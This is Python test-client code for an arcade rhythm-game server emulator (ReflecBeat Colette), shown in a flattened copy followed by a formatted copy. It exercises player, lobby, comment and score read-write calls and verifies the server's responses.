player.set_attribute('method', 'delete')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_end(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'end')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player')\n\n def verify_player_succeed(self, refid: str) ->None:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'succeed')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/name')\n self.assert_path(resp, 'response/player/lv')\n self.assert_path(resp, 'response/player/exp')\n self.assert_path(resp, 'response/player/grd')\n self.assert_path(resp, 'response/player/ap')\n self.assert_path(resp, 'response/player/released')\n self.assert_path(resp, 'response/player/mrecord')\n\n def verify_player_read(self, refid: str, location: str) ->List[Dict[str,\n int]]:\n call = self.call_node()\n player = Node.void('player')\n player.set_attribute('method', 'read')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.string('lid', location))\n player.add_child(Node.s16('ver', 5))\n call.add_child(player)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/pdata/account/usrid')\n self.assert_path(resp, 'response/player/pdata/account/tpc')\n self.assert_path(resp, 'response/player/pdata/account/dpc')\n self.assert_path(resp, 'response/player/pdata/account/crd')\n self.assert_path(resp, 'response/player/pdata/account/brd')\n self.assert_path(resp, 'response/player/pdata/account/tdc')\n self.assert_path(resp, 'response/player/pdata/account/intrvld')\n self.assert_path(resp, 'response/player/pdata/account/ver')\n self.assert_path(resp, 'response/player/pdata/account/pst')\n self.assert_path(resp, 'response/player/pdata/account/st')\n self.assert_path(resp, 'response/player/pdata/base/name')\n self.assert_path(resp, 'response/player/pdata/base/exp')\n self.assert_path(resp, 'response/player/pdata/base/lv')\n self.assert_path(resp, 'response/player/pdata/base/mg')\n self.assert_path(resp, 'response/player/pdata/base/ap')\n self.assert_path(resp, 'response/player/pdata/base/tid')\n self.assert_path(resp, 'response/player/pdata/base/tname')\n self.assert_path(resp, 'response/player/pdata/base/cmnt')\n self.assert_path(resp, 'response/player/pdata/base/uattr')\n self.assert_path(resp, 'response/player/pdata/base/hidden_param')\n self.assert_path(resp, 'response/player/pdata/base/tbs')\n self.assert_path(resp, 'response/player/pdata/base/tbs_r')\n self.assert_path(resp, 'response/player/pdata/rival')\n self.assert_path(resp, 'response/player/pdata/fav_music_slot')\n self.assert_path(resp, 'response/player/pdata/custom')\n self.assert_path(resp, 'response/player/pdata/config')\n self.assert_path(resp, 'response/player/pdata/stamp')\n self.assert_path(resp, 'response/player/pdata/released')\n self.assert_path(resp, 'response/player/pdata/record')\n if resp.child_value('player/pdata/base/name') != self.NAME:\n raise Exception('Invalid name {} returned on profile read!'.\n format(resp.child_value('player/pdata/base/name')))\n scores = []\n for child in resp.child('player/pdata/record').children:\n if child.name != 'rec':\n continue\n score = {'id': child.child_value('mid'), 'chart': child.\n child_value('ntgrd'), 'clear_type': child.child_value('ct'),\n 'achievement_rate': child.child_value('ar'), 'score': child\n .child_value('scr'), 'combo': child.child_value('cmb'),\n 'miss_count': child.child_value('ms')}\n scores.append(score)\n return scores\n\n def verify_player_write(self, refid: str, loc: str, scores: List[Dict[\n str, int]]) ->int:\n call = self.call_node()\n player = Node.void('player')\n call.add_child(player)\n player.set_attribute('method', 'write')\n pdata = Node.void('pdata')\n player.add_child(pdata)\n account = Node.void('account')\n pdata.add_child(account)\n account.add_child(Node.s32('usrid', 0))\n account.add_child(Node.s32('plyid', 0))\n account.add_child(Node.s32('tpc', 1))\n account.add_child(Node.s32('dpc', 1))\n account.add_child(Node.s32('crd', 1))\n account.add_child(Node.s32('brd', 1))\n account.add_child(Node.s32('tdc', 1))\n account.add_child(Node.string('rid', refid))\n account.add_child(Node.string('lid', loc))\n account.add_child(Node.u8('mode', 0))\n account.add_child(Node.s16('ver', 5))\n account.add_child(Node.bool('pp', True))\n account.add_child(Node.bool('ps', True))\n account.add_child(Node.s16('pay', 0))\n account.add_child(Node.s16('pay_pc', 0))\n account.add_child(Node.u64('st', int(time.time() * 1000)))\n base = Node.void('base')\n pdata.add_child(base)\n base.add_child(Node.string('name', self.NAME))\n base.add_child(Node.s32('exp', 0))\n base.add_child(Node.s32('lv', 1))\n base.add_child(Node.s32('mg', -1))\n base.add_child(Node.s32('ap', -1))\n base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, \n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))\n base.add_child(Node.bool('is_tut', True))\n stglog = Node.void('stglog')\n pdata.add_child(stglog)\n index = 0\n for score in scores:\n log = Node.void('log')\n stglog.add_child(log)\n log.add_child(Node.s8('stg', index))\n log.add_child(Node.s16('mid', score['id']))\n log.add_child(Node.s8('ng', score['chart']))\n log.add_child(Node.s8('col', 0))\n log.add_child(Node.s8('mt', 7))\n log.add_child(Node.s8('rt', 0))\n log.add_child(Node.s8('ct', score['clear_type']))\n log.add_child(Node.s16('grd', 0))\n log.add_child(Node.s16('ar', score['achievement_rate']))\n log.add_child(Node.s16('sc', score['score']))\n log.add_child(Node.s16('jt_jst', 0))\n log.add_child(Node.s16('jt_grt', 0))\n log.add_child(Node.s16('jt_gd', 0))\n log.add_child(Node.s16('jt_ms', score['miss_count']))\n log.add_child(Node.s16('jt_jr', 0))\n log.add_child(Node.s16('cmb', score['combo']))\n log.add_child(Node.s16('exp', 0))\n log.add_child(Node.s32('r_uid', 0))\n log.add_child(Node.s32('r_plyid', 0))\n log.add_child(Node.s8('r_stg', 0))\n log.add_child(Node.s8('r_ct', -1))\n log.add_child(Node.s16('r_sc', 0))\n log.add_child(Node.s16('r_grd', 0))\n log.add_child(Node.s16('r_ar', 0))\n log.add_child(Node.s8('r_cpuid', -1))\n log.add_child(Node.s32('time', int(time.time())))\n log.add_child(Node.s8('decide', 0))\n index = index + 1\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/player/uid')\n return resp.child_value('player/uid')\n\n def verify_lobby_read(self, location: str, extid: int) ->None:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'read')\n lobby.add_child(Node.s32('uid', extid))\n lobby.add_child(Node.u8('m_grade', 255))\n lobby.add_child(Node.string('lid', location))\n lobby.add_child(Node.s32('max', 128))\n lobby.add_child(Node.s32_array('friend', []))\n lobby.add_child(Node.u8('var', 5))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby/interval')\n self.assert_path(resp, 'response/lobby/interval_p')\n\n def verify_lobby_entry(self, location: str, extid: int) ->int:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'entry')\n e = Node.void('e')\n lobby.add_child(e)\n e.add_child(Node.s32('eid', 0))\n e.add_child(Node.u16('mid', 79))\n e.add_child(Node.u8('ng', 0))\n e.add_child(Node.s32('uid', extid))\n e.add_child(Node.s32('uattr', 0))\n e.add_child(Node.string('pn', self.NAME))\n e.add_child(Node.s16('mg', 255))\n e.add_child(Node.s32('mopt', 0))\n e.add_child(Node.s32('tid', 0))\n e.add_child(Node.string('tn', ''))\n e.add_child(Node.s32('topt', 0))\n e.add_child(Node.string('lid', location))\n e.add_child(Node.string('sn', ''))\n e.add_child(Node.u8('pref', 51))\n e.add_child(Node.s8('stg', 4))\n e.add_child(Node.s8('pside', 0))\n e.add_child(Node.s16('eatime', 30))\n e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n e.add_child(Node.u16('gp', 10007))\n e.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n e.add_child(Node.u8('ver', 5))\n lobby.add_child(Node.s32_array('friend', []))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby/interval')\n self.assert_path(resp, 'response/lobby/interval_p')\n self.assert_path(resp, 'response/lobby/eid')\n self.assert_path(resp, 'response/lobby/e/eid')\n self.assert_path(resp, 'response/lobby/e/mid')\n self.assert_path(resp, 'response/lobby/e/ng')\n self.assert_path(resp, 'response/lobby/e/uid')\n self.assert_path(resp, 'response/lobby/e/uattr')\n self.assert_path(resp, 'response/lobby/e/pn')\n self.assert_path(resp, 'response/lobby/e/mg')\n self.assert_path(resp, 'response/lobby/e/mopt')\n self.assert_path(resp, 'response/lobby/e/tid')\n self.assert_path(resp, 'response/lobby/e/tn')\n self.assert_path(resp, 'response/lobby/e/topt')\n self.assert_path(resp, 'response/lobby/e/lid')\n self.assert_path(resp, 'response/lobby/e/sn')\n self.assert_path(resp, 'response/lobby/e/pref')\n self.assert_path(resp, 'response/lobby/e/stg')\n self.assert_path(resp, 'response/lobby/e/pside')\n self.assert_path(resp, 'response/lobby/e/eatime')\n self.assert_path(resp, 'response/lobby/e/ga')\n self.assert_path(resp, 'response/lobby/e/gp')\n self.assert_path(resp, 'response/lobby/e/la')\n self.assert_path(resp, 'response/lobby/e/ver')\n return resp.child_value('lobby/eid')\n\n def verify_lobby_delete(self, eid: int) ->None:\n call = self.call_node()\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'delete')\n lobby.add_child(Node.s32('eid', eid))\n call.add_child(lobby)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/lobby')\n\n def verify_pzlcmt_read(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_read')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.s32('time', 0))\n info.add_child(Node.s32('limit', 30))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info/comment/time')\n self.assert_path(resp, 'response/info/c/uid')\n self.assert_path(resp, 'response/info/c/name')\n self.assert_path(resp, 'response/info/c/icon')\n self.assert_path(resp, 'response/info/c/bln')\n self.assert_path(resp, 'response/info/c/tid')\n self.assert_path(resp, 'response/info/c/t_name')\n self.assert_path(resp, 'response/info/c/pref')\n self.assert_path(resp, 'response/info/c/time')\n self.assert_path(resp, 'response/info/c/comment')\n self.assert_path(resp, 'response/info/c/is_tweet')\n found = False\n for child in resp.child('info').children:\n if child.name != 'c':\n continue\n if child.child_value('uid') == extid:\n name = child.child_value('name')\n comment = child.child_value('comment')\n if name != self.NAME:\n raise Exception(\"Invalid name '{}' returned for comment!\"\n .format(name))\n if comment != 'アメ〜〜!':\n raise Exception(\n \"Invalid comment '{}' returned for comment!\".format\n (comment))\n found = True\n if not found:\n raise Exception('Comment we posted was not found!')\n\n def verify_pzlcmt_write(self, extid: int) ->None:\n call = self.call_node()\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_write')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.string('name', self.NAME))\n info.add_child(Node.s16('icon', 0))\n info.add_child(Node.s8('bln', 0))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.string('t_name', ''))\n info.add_child(Node.s8('pref', 51))\n info.add_child(Node.s32('time', int(time.time())))\n info.add_child(Node.string('comment', 'アメ〜〜!'))\n info.add_child(Node.bool('is_tweet', True))\n call.add_child(info)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/info')\n\n def verify_jbrbcollabo_save(self, refid: str) ->None:\n call = self.call_node()\n jbrbcollabo = Node.void('jbrbcollabo')\n jbrbcollabo.set_attribute('method', 'save')\n jbrbcollabo.add_child(Node.string('ref_id', refid))\n jbrbcollabo.add_child(Node.u16('cre_count', 0))\n call.add_child(jbrbcollabo)\n resp = self.exchange('', call)\n self.assert_path(resp, 'response/jbrbcollabo')\n\n def verify(self, cardid: Optional[str]) ->None:\n self.verify_services_get(expected_services=['pcbtracker',\n 'pcbevent', 'local', 'message', 'facility', 'cardmng',\n 'package', 'posevent', 'pkglist', 'dlstatus', 'eacoin', 'lobby',\n 'ntp', 'keepalive'])\n paseli_enabled = self.verify_pcbtracker_alive()\n self.verify_message_get()\n self.verify_package_list()\n location = self.verify_facility_get()\n self.verify_pcbevent_put()\n self.verify_pcb_boot(location)\n self.verify_info_common()\n if cardid is not None:\n card = cardid\n else:\n card = self.random_card()\n print('Generated random card ID {} for use.'.format(card))\n if cardid is None:\n self.verify_cardmng_inquire(card, msg_type='unregistered',\n paseli_enabled=paseli_enabled)\n ref_id = self.verify_cardmng_getrefid(card)\n if len(ref_id) != 16:\n raise Exception(\n \"Invalid refid '{}' returned when registering card\".\n format(ref_id))\n if ref_id != self.verify_cardmng_inquire(card, msg_type='new',\n paseli_enabled=paseli_enabled):\n raise Exception(\n \"Invalid refid '{}' returned when querying card\".format\n (ref_id))\n self.verify_player_start(ref_id)\n self.verify_player_delete(ref_id)\n self.verify_player_succeed(ref_id)\n extid = self.verify_player_write(ref_id, location, [{'id': 0,\n 'chart': 0, 'clear_type': -1, 'achievement_rate': 0,\n 'score': 0, 'combo': 0, 'miss_count': 0}])\n else:\n print('Skipping new card checks for existing card')\n ref_id = self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled)\n self.verify_cardmng_authpass(ref_id, correct=True)\n self.verify_cardmng_authpass(ref_id, correct=False)\n if ref_id != self.verify_cardmng_inquire(card, msg_type='query',\n paseli_enabled=paseli_enabled):\n raise Exception(\"Invalid refid '{}' returned when querying card\"\n .format(ref_id))\n self.verify_lobby_read(location, extid)\n eid = self.verify_lobby_entry(location, extid)\n self.verify_lobby_delete(eid)\n self.verify_pzlcmt_write(extid)\n self.verify_pzlcmt_read(extid)\n self.verify_jbrbcollabo_save(ref_id)\n if cardid is None:\n for phase in [1, 2]:\n if phase == 1:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 2,\n 'achievement_rate': 7543, 'score': 432, 'combo': \n 123, 'miss_count': 5}, {'id': 1, 'chart': 0,\n 'clear_type': 4, 'achievement_rate': 9876, 'score':\n 543, 'combo': 543, 'miss_count': 0}, {'id': 3,\n 'chart': 2, 'clear_type': 2, 'achievement_rate': \n 1234, 'score': 123, 'combo': 42, 'miss_count': 54},\n {'id': 3, 'chart': 0, 'clear_type': 2,\n 'achievement_rate': 1024, 'score': 50, 'combo': 12,\n 'miss_count': 90}]\n if phase == 2:\n dummyscores = [{'id': 1, 'chart': 1, 'clear_type': 3,\n 'achievement_rate': 8765, 'score': 469, 'combo': \n 468, 'miss_count': 1}, {'id': 1, 'chart': 0,\n 'clear_type': 2, 'achievement_rate': 8765, 'score':\n 432, 'combo': 321, 'miss_count': 15,\n 'expected_score': 543, 'expected_clear_type': 4,\n 'expected_achievement_rate': 9876, 'expected_combo':\n 543, 'expected_miss_count': 0}]\n self.verify_player_write(ref_id, location, dummyscores)\n scores = self.verify_player_read(ref_id, location)\n for expected in dummyscores:\n actual = None\n for received in scores:\n if received['id'] == expected['id'] and received[\n 'chart'] == expected['chart']:\n actual = received\n break\n if actual is None:\n raise Exception(\n \"Didn't find song {} chart {} in response!\".\n format(expected['id'], expected['chart']))\n if 'expected_score' in expected:\n expected_score = expected['expected_score']\n else:\n expected_score = expected['score']\n if 'expected_achievement_rate' in expected:\n expected_achievement_rate = expected[\n 'expected_achievement_rate']\n else:\n expected_achievement_rate = expected['achievement_rate'\n ]\n if 'expected_clear_type' in expected:\n expected_clear_type = expected['expected_clear_type']\n else:\n expected_clear_type = expected['clear_type']\n if 'expected_combo' in expected:\n expected_combo = expected['expected_combo']\n else:\n expected_combo = expected['combo']\n if 'expected_miss_count' in expected:\n expected_miss_count = expected['expected_miss_count']\n else:\n expected_miss_count = expected['miss_count']\n if actual['score'] != expected_score:\n raise Exception(\n \"Expected a score of '{}' for song '{}' chart '{}' but got score '{}'\"\n .format(expected_score, expected['id'],\n expected['chart'], actual['score']))\n if actual['achievement_rate'] != expected_achievement_rate:\n raise Exception(\n \"Expected an achievement rate of '{}' for song '{}' chart '{}' but got achievement rate '{}'\"\n .format(expected_achievement_rate, expected[\n 'id'], expected['chart'], actual[\n 'achievement_rate']))\n if actual['clear_type'] != expected_clear_type:\n raise Exception(\n \"Expected a clear_type of '{}' for song '{}' chart '{}' but got clear_type '{}'\"\n .format(expected_clear_type, expected['id'],\n expected['chart'], actual['clear_type']))\n if actual['combo'] != expected_combo:\n raise Exception(\n \"Expected a combo of '{}' for song '{}' chart '{}' but got combo '{}'\"\n .format(expected_combo, expected['id'],\n expected['chart'], actual['combo']))\n if actual['miss_count'] != expected_miss_count:\n raise Exception(\n \"Expected a miss count of '{}' for song '{}' chart '{}' but got miss count '{}'\"\n .format(expected_miss_count, expected['id'],\n expected['chart'], actual['miss_count']))\n time.sleep(1)\n else:\n print('Skipping score checks for existing card')\n self.verify_player_end(ref_id)\n self.verify_info_ranking()\n if paseli_enabled:\n print('PASELI enabled for this PCBID, executing PASELI checks')\n else:\n print('PASELI disabled for this PCBID, skipping PASELI checks')\n return\n sessid, balance = self.verify_eacoin_checkin(card)\n if balance == 0:\n print('Skipping PASELI consume check because card has 0 balance')\n else:\n self.verify_eacoin_consume(sessid, balance, random.randint(0,\n balance))\n self.verify_eacoin_checkout(sessid)\n",
"step-5": "import random\nimport time\nfrom typing import Dict, List, Optional\n\nfrom bemani.client.base import BaseClient\nfrom bemani.protocol import Node\n\n\nclass ReflecBeatColette(BaseClient):\n NAME = 'TEST'\n\n def verify_pcb_boot(self, loc: str) -> None:\n call = self.call_node()\n\n pcb = Node.void('pcb')\n pcb.set_attribute('method', 'boot')\n pcb.add_child(Node.string('lid', loc))\n call.add_child(pcb)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/pcb/sinfo/nm\")\n self.assert_path(resp, \"response/pcb/sinfo/cl_enbl\")\n self.assert_path(resp, \"response/pcb/sinfo/cl_h\")\n self.assert_path(resp, \"response/pcb/sinfo/cl_m\")\n\n def verify_info_common(self) -> None:\n call = self.call_node()\n\n info = Node.void('info')\n info.set_attribute('method', 'common')\n call.add_child(info)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/info/event_ctrl\")\n self.assert_path(resp, \"response/info/item_lock_ctrl\")\n\n def verify_info_ranking(self) -> None:\n call = self.call_node()\n\n info = Node.void('info')\n info.set_attribute('method', 'ranking')\n info.add_child(Node.s32('ver', 0))\n call.add_child(info)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/info/ver\")\n self.assert_path(resp, \"response/info/ranking/weekly/bt\")\n self.assert_path(resp, \"response/info/ranking/weekly/et\")\n self.assert_path(resp, \"response/info/ranking/weekly/new/d/mid\")\n self.assert_path(resp, \"response/info/ranking/weekly/new/d/cnt\")\n self.assert_path(resp, \"response/info/ranking/monthly/bt\")\n self.assert_path(resp, \"response/info/ranking/monthly/et\")\n self.assert_path(resp, \"response/info/ranking/monthly/new/d/mid\")\n self.assert_path(resp, \"response/info/ranking/monthly/new/d/cnt\")\n self.assert_path(resp, \"response/info/ranking/total/bt\")\n self.assert_path(resp, \"response/info/ranking/total/et\")\n self.assert_path(resp, \"response/info/ranking/total/new/d/mid\")\n self.assert_path(resp, \"response/info/ranking/total/new/d/cnt\")\n\n def verify_player_start(self, refid: str) -> None:\n call = self.call_node()\n\n player = Node.void('player')\n player.set_attribute('method', 'start')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n player.add_child(Node.u16('gp', 10573))\n player.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n call.add_child(player)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player/plyid\")\n self.assert_path(resp, \"response/player/start_time\")\n self.assert_path(resp, \"response/player/event_ctrl\")\n self.assert_path(resp, \"response/player/item_lock_ctrl\")\n self.assert_path(resp, \"response/player/lincle_link_4\")\n self.assert_path(resp, \"response/player/jbrbcollabo\")\n self.assert_path(resp, \"response/player/tricolettepark\")\n\n def verify_player_delete(self, refid: str) -> None:\n call = self.call_node()\n\n player = Node.void('player')\n player.set_attribute('method', 'delete')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player\")\n\n def verify_player_end(self, refid: str) -> None:\n call = self.call_node()\n\n player = Node.void('player')\n player.set_attribute('method', 'end')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player\")\n\n def verify_player_succeed(self, refid: str) -> None:\n call = self.call_node()\n\n player = Node.void('player')\n player.set_attribute('method', 'succeed')\n player.add_child(Node.string('rid', refid))\n call.add_child(player)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player/name\")\n self.assert_path(resp, \"response/player/lv\")\n self.assert_path(resp, \"response/player/exp\")\n self.assert_path(resp, \"response/player/grd\")\n self.assert_path(resp, \"response/player/ap\")\n self.assert_path(resp, \"response/player/released\")\n self.assert_path(resp, \"response/player/mrecord\")\n\n def verify_player_read(self, refid: str, location: str) -> List[Dict[str, int]]:\n call = self.call_node()\n\n player = Node.void('player')\n player.set_attribute('method', 'read')\n player.add_child(Node.string('rid', refid))\n player.add_child(Node.string('lid', location))\n player.add_child(Node.s16('ver', 5))\n call.add_child(player)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player/pdata/account/usrid\")\n self.assert_path(resp, \"response/player/pdata/account/tpc\")\n self.assert_path(resp, \"response/player/pdata/account/dpc\")\n self.assert_path(resp, \"response/player/pdata/account/crd\")\n self.assert_path(resp, \"response/player/pdata/account/brd\")\n self.assert_path(resp, \"response/player/pdata/account/tdc\")\n self.assert_path(resp, \"response/player/pdata/account/intrvld\")\n self.assert_path(resp, \"response/player/pdata/account/ver\")\n self.assert_path(resp, \"response/player/pdata/account/pst\")\n self.assert_path(resp, \"response/player/pdata/account/st\")\n self.assert_path(resp, \"response/player/pdata/base/name\")\n self.assert_path(resp, \"response/player/pdata/base/exp\")\n self.assert_path(resp, \"response/player/pdata/base/lv\")\n self.assert_path(resp, \"response/player/pdata/base/mg\")\n self.assert_path(resp, \"response/player/pdata/base/ap\")\n self.assert_path(resp, \"response/player/pdata/base/tid\")\n self.assert_path(resp, \"response/player/pdata/base/tname\")\n self.assert_path(resp, \"response/player/pdata/base/cmnt\")\n self.assert_path(resp, \"response/player/pdata/base/uattr\")\n self.assert_path(resp, \"response/player/pdata/base/hidden_param\")\n self.assert_path(resp, \"response/player/pdata/base/tbs\")\n self.assert_path(resp, \"response/player/pdata/base/tbs_r\")\n self.assert_path(resp, \"response/player/pdata/rival\")\n self.assert_path(resp, \"response/player/pdata/fav_music_slot\")\n self.assert_path(resp, \"response/player/pdata/custom\")\n self.assert_path(resp, \"response/player/pdata/config\")\n self.assert_path(resp, \"response/player/pdata/stamp\")\n self.assert_path(resp, \"response/player/pdata/released\")\n self.assert_path(resp, \"response/player/pdata/record\")\n\n if resp.child_value('player/pdata/base/name') != self.NAME:\n raise Exception('Invalid name {} returned on profile read!'.format(resp.child_value('player/pdata/base/name')))\n\n scores = []\n for child in resp.child('player/pdata/record').children:\n if child.name != 'rec':\n continue\n\n score = {\n 'id': child.child_value('mid'),\n 'chart': child.child_value('ntgrd'),\n 'clear_type': child.child_value('ct'),\n 'achievement_rate': child.child_value('ar'),\n 'score': child.child_value('scr'),\n 'combo': child.child_value('cmb'),\n 'miss_count': child.child_value('ms'),\n }\n scores.append(score)\n return scores\n\n def verify_player_write(self, refid: str, loc: str, scores: List[Dict[str, int]]) -> int:\n call = self.call_node()\n\n player = Node.void('player')\n call.add_child(player)\n player.set_attribute('method', 'write')\n pdata = Node.void('pdata')\n player.add_child(pdata)\n account = Node.void('account')\n pdata.add_child(account)\n account.add_child(Node.s32('usrid', 0))\n account.add_child(Node.s32('plyid', 0))\n account.add_child(Node.s32('tpc', 1))\n account.add_child(Node.s32('dpc', 1))\n account.add_child(Node.s32('crd', 1))\n account.add_child(Node.s32('brd', 1))\n account.add_child(Node.s32('tdc', 1))\n account.add_child(Node.string('rid', refid))\n account.add_child(Node.string('lid', loc))\n account.add_child(Node.u8('mode', 0))\n account.add_child(Node.s16('ver', 5))\n account.add_child(Node.bool('pp', True))\n account.add_child(Node.bool('ps', True))\n account.add_child(Node.s16('pay', 0))\n account.add_child(Node.s16('pay_pc', 0))\n account.add_child(Node.u64('st', int(time.time() * 1000)))\n base = Node.void('base')\n pdata.add_child(base)\n base.add_child(Node.string('name', self.NAME))\n base.add_child(Node.s32('exp', 0))\n base.add_child(Node.s32('lv', 1))\n base.add_child(Node.s32('mg', -1))\n base.add_child(Node.s32('ap', -1))\n base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))\n base.add_child(Node.bool('is_tut', True))\n stglog = Node.void('stglog')\n pdata.add_child(stglog)\n index = 0\n for score in scores:\n log = Node.void('log')\n stglog.add_child(log)\n log.add_child(Node.s8('stg', index))\n log.add_child(Node.s16('mid', score['id']))\n log.add_child(Node.s8('ng', score['chart']))\n log.add_child(Node.s8('col', 0))\n log.add_child(Node.s8('mt', 7))\n log.add_child(Node.s8('rt', 0))\n log.add_child(Node.s8('ct', score['clear_type']))\n log.add_child(Node.s16('grd', 0))\n log.add_child(Node.s16('ar', score['achievement_rate']))\n log.add_child(Node.s16('sc', score['score']))\n log.add_child(Node.s16('jt_jst', 0))\n log.add_child(Node.s16('jt_grt', 0))\n log.add_child(Node.s16('jt_gd', 0))\n log.add_child(Node.s16('jt_ms', score['miss_count']))\n log.add_child(Node.s16('jt_jr', 0))\n log.add_child(Node.s16('cmb', score['combo']))\n log.add_child(Node.s16('exp', 0))\n log.add_child(Node.s32('r_uid', 0))\n log.add_child(Node.s32('r_plyid', 0))\n log.add_child(Node.s8('r_stg', 0))\n log.add_child(Node.s8('r_ct', -1))\n log.add_child(Node.s16('r_sc', 0))\n log.add_child(Node.s16('r_grd', 0))\n log.add_child(Node.s16('r_ar', 0))\n log.add_child(Node.s8('r_cpuid', -1))\n log.add_child(Node.s32('time', int(time.time())))\n log.add_child(Node.s8('decide', 0))\n index = index + 1\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/player/uid\")\n return resp.child_value('player/uid')\n\n def verify_lobby_read(self, location: str, extid: int) -> None:\n call = self.call_node()\n\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'read')\n lobby.add_child(Node.s32('uid', extid))\n lobby.add_child(Node.u8('m_grade', 255))\n lobby.add_child(Node.string('lid', location))\n lobby.add_child(Node.s32('max', 128))\n lobby.add_child(Node.s32_array('friend', []))\n lobby.add_child(Node.u8('var', 5))\n call.add_child(lobby)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/lobby/interval\")\n self.assert_path(resp, \"response/lobby/interval_p\")\n\n def verify_lobby_entry(self, location: str, extid: int) -> int:\n call = self.call_node()\n\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'entry')\n e = Node.void('e')\n lobby.add_child(e)\n e.add_child(Node.s32('eid', 0))\n e.add_child(Node.u16('mid', 79))\n e.add_child(Node.u8('ng', 0))\n e.add_child(Node.s32('uid', extid))\n e.add_child(Node.s32('uattr', 0))\n e.add_child(Node.string('pn', self.NAME))\n e.add_child(Node.s16('mg', 255))\n e.add_child(Node.s32('mopt', 0))\n e.add_child(Node.s32('tid', 0))\n e.add_child(Node.string('tn', ''))\n e.add_child(Node.s32('topt', 0))\n e.add_child(Node.string('lid', location))\n e.add_child(Node.string('sn', ''))\n e.add_child(Node.u8('pref', 51))\n e.add_child(Node.s8('stg', 4))\n e.add_child(Node.s8('pside', 0))\n e.add_child(Node.s16('eatime', 30))\n e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))\n e.add_child(Node.u16('gp', 10007))\n e.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n e.add_child(Node.u8('ver', 5))\n lobby.add_child(Node.s32_array('friend', []))\n call.add_child(lobby)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/lobby/interval\")\n self.assert_path(resp, \"response/lobby/interval_p\")\n self.assert_path(resp, \"response/lobby/eid\")\n self.assert_path(resp, \"response/lobby/e/eid\")\n self.assert_path(resp, \"response/lobby/e/mid\")\n self.assert_path(resp, \"response/lobby/e/ng\")\n self.assert_path(resp, \"response/lobby/e/uid\")\n self.assert_path(resp, \"response/lobby/e/uattr\")\n self.assert_path(resp, \"response/lobby/e/pn\")\n self.assert_path(resp, \"response/lobby/e/mg\")\n self.assert_path(resp, \"response/lobby/e/mopt\")\n self.assert_path(resp, \"response/lobby/e/tid\")\n self.assert_path(resp, \"response/lobby/e/tn\")\n self.assert_path(resp, \"response/lobby/e/topt\")\n self.assert_path(resp, \"response/lobby/e/lid\")\n self.assert_path(resp, \"response/lobby/e/sn\")\n self.assert_path(resp, \"response/lobby/e/pref\")\n self.assert_path(resp, \"response/lobby/e/stg\")\n self.assert_path(resp, \"response/lobby/e/pside\")\n self.assert_path(resp, \"response/lobby/e/eatime\")\n self.assert_path(resp, 